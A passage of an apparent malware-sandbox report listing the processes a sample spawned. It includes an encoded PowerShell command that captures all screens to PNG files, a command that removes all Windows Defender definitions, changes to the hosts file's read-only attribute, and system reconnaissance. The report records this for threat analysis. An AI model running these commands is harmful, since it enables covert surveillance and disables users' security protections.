                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                            Start time:02:37:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff736be0000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                            Imagebase:0x7ff72f7f0000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                            Start time:02:37:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                            Start time:02:37:30
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                            Start time:02:37:30
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff7d4420000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                            Start time:02:37:30
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff736450000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff736450000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                            Imagebase:0x7ff7302b0000
                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                            Start time:02:37:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff7d4420000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                            Start time:02:37:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
                                                                                                                                                                                                                            Imagebase:0x7ff7389d0000
                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                            Start time:02:37:32
                                                                                                                                                                                                                            Start date:13/12/2024
